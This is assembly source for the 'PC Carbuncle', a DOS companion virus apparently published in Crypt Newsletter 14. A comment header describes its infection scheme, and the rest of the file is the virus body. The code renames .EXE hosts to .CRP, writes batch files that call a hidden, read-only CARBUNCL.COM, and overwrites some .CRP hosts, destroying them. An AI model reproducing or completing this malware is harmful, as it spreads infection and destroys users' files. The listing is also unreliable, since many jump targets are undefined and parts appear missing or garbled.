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synced 2025-02-23 06:54:39 +00:00
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245 lines
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;The PC CARBUNCLE VIRUS - a companion virus for Crypt Newsletter 14
;The PC Carbuncle is a "toy" virus which will search out every .EXEfile
;in the current directory, rename it with a .CRP [for Crypt] extent and
;create a batchfile. The batchfile calls the PC Carbuncle [which has
;copied itself to a hidden file in the directory], renames the host
;file to its NORMAL extent, executes it, hides it as a .CRP file once
;again and issues a few error messages. The host files function
;normally. Occasionaly, the PC Carbuncle will copy itself to a few
;of the host .CRP files, destroying them. The majority of the host
;files in the PC Carbuncle-controlled directory will continue to function,
;in any case. If the user discovers the .CRP and .BAT files and is smart
;enough to delete the batchfiles and rename the .CRP hosts to their
;normal .EXE extents, the .CRPfiles which have been infected by the
;virus will re-establish the infection in the directory.
;--Urnst Kouch, Crypt Newsletter 14
.radix 16
code segment
model small
assume cs:code, ds:code, es:code
org 100h
jmp vir_start
db '<27><>.<2E><>Nst<73>d<EFBFBD>M<EFBFBD>$' ; name
mov ah, 4Ch ; exit to DOS
int 21h
mov ah,2Ch ; DOS get system time.
int 21h ; <--alter values to suit
cmp dh,10 ; is seconds > 10?
jg batch_stage ; if so, be quiet (jg)
; with the virus counter, this feature arrests the
; overwriting infection so
; computing isn't
; horribly disrupted
; when the virus is about
mov al,5 ; infect only a few files
mov count,al ; by establishing a counter
start: mov ah,4Eh ; <----find first file of
mov dx,offset crp_ext ; matching filemask, "*.crp"
int 21h ; because PC CARBUNCLE has
; in most cases, already created
; them.
jc batch_stage ; jump on carry to
; spawn if no .CRPfiles found
mov ax,3D01h ; open .CRPfile r/w
mov dx,009Eh
int 21h
mov bh,40h ;
mov dx,0100h ; starting from beginning
xchg ax,bx ; put handle in ax
mov cl,2Ah ; to write: PC CARBUNCLE
int 21h ; write the virus
mov ah,3Eh ; close the file
int 21h
dec count ; take one off the count
jz exit ; and exit when a few files
; are overwritten with virus
mov ah,4Fh ; find next file
jmp Short recurse ; and continue until all .CRP
; files converted to PC
mov dx,offset file_create ; create file, name of
mov cx,0 ; CARBUNCL.COM
mov ah,3ch
int 21h
; Write virus body to file
mov bx,ax
mov cx,offset last - offset begin
mov dx,100h
mov ah,40h
int 21h
; Close file
mov ah,3eh ; ASSUMES bx still has file handle
int 21h
; Change attributes
mov dx,offset file_create ; of created file to
mov cx,3 ;(1) read only and (2) hidden
mov ax,4301h
int 21h
; get DTA
mov ah, 1Ah ; where to put dta
lea DX, [LAST+90H]
int 21h
mov ah, 4Eh ; find first .EXE file
small_loop: ; to CARBUNCL-ize
lea dx, [vict_ext] ; searchmask, *.exe
int 21h
jc exit
mov si, offset last + 90h + 30d ; save name
mov di, offset orig_name
mov cx, 12d
rep movsb
mov si, offset orig_name ; put name in bat buffer
mov di, offset bat_name
mov cx, 12d
rep movsb
mov di, offset bat_name
mov al, '.'
mov cx, 9d
repne scasb
push cx
cmp word ptr es:[di-3],'SU' ; useless rubbish
jne cont
mov ah, 4fh
jmp small_loop
cont: mov si, offset bat_ext ;fix bat
mov cx, 3
rep movsb
pop cx
mov si, offset blank ;further fix bat
rep movsb
mov si, offset orig_name ; fill rename
mov di, offset rename_name
mov cx, 12d
rep movsb
mov di, offset rename_name
mov al, '.'
mov cx, 9
repne scasb
push cx
mov si, offset moc_ext ; fix rename
mov cx, 3
rep movsb
pop cx
mov si, offset blank ; further fix rename
rep movsb ; copy the string over
mov di, offset orig_name
mov al, ' '
mov cx, 12
repne scasb
mov si, offset blank ; put a few blanks
rep movsb
mov si, offset orig_name ;fill in the created batfile
mov di, offset com1
mov cx, 12d
rep movsb
mov si, offset orig_name ; more fill
mov di, offset com2
mov cx, 12d
rep movsb
mov si, offset orig_name ; copy more fill
mov di, offset com3
mov cx, 12d
rep movsb
mov si, offset blank
point_srch: dec di ; get rid of an annoying
cmp byte ptr [di], 00 ; period
jne point_srch
rep movsb
mov si, offset rename_name ; copy more fill
mov di, offset moc1
mov cx, 12d
rep movsb
mov si, offset rename_name ; copy still more fill
mov di, offset moc2
mov cx, 12d
rep movsb
mov dx, offset orig_name ; rename original file
mov di, offset rename_name ; to new .CRP name
mov ah, 56h
int 21h
mov dx, offset bat_name ; create batfile
xor cx, cx
mov ah, 3Ch
int 21h
mov bx, ax
mov cx, (offset l_bat - offset s_bat) ; length of batfile
mov dx, offset s_bat ; write to file
mov ah, 40h
int 21h
mov ah, 3eh ; close batfile
int 21h
next_vict: mov ah, 4fh ; find the next host
jmp small_loop ; and create more
; "controlled" .CRPs
count db 90h ;<---count buffer, bogus value
crp_ext db "*.crp",0 ;<---- searchmask for PC CARBUNCLE
file_create db "CARBUNCL.COM",0 ;<---CARBUNCL shadow virus
bat_ext db "BAT"
Vict_ext db "*.exe",0 ;<----searchmask for hosts to CARBUNCL-ize
moc_ext db "CRP" ; new extent for CARBUNCL-ized hosts
blank db " " ;blanks for filling batchfile
db "@ECHO OFF",0Dh,0Ah ; <--batchfile command lines
db "CARBUNCL",0Dh,0Ah ; call PC CARBUNCL shadow virus
db "RENAME "
moc1 db 12 dup (' '),' '
com1 db 12 dup (' '),0dh,0ah
com2 db 12 dup (' '),0dh,0ah
db "RENAME "
com3 db 12 dup (' '),' '
moc2 db 12 dup (' '),0dh,0ah
db "CARBUNCL",0Dh,0Ah,01Ah ;<---put dumb message here
L_bat: ; format "ECHO Fuck you lamer"
note: db "PC CARBUNCLE: Crypt Newsletter 14",0
bat_name db 12 dup (' '),0 ; on the fly workspace
rename_name db 12 dup (' '),0
orig_name db 12 dup (' '),0
Last: ;<---- end of virus place-holder
code ends
end begin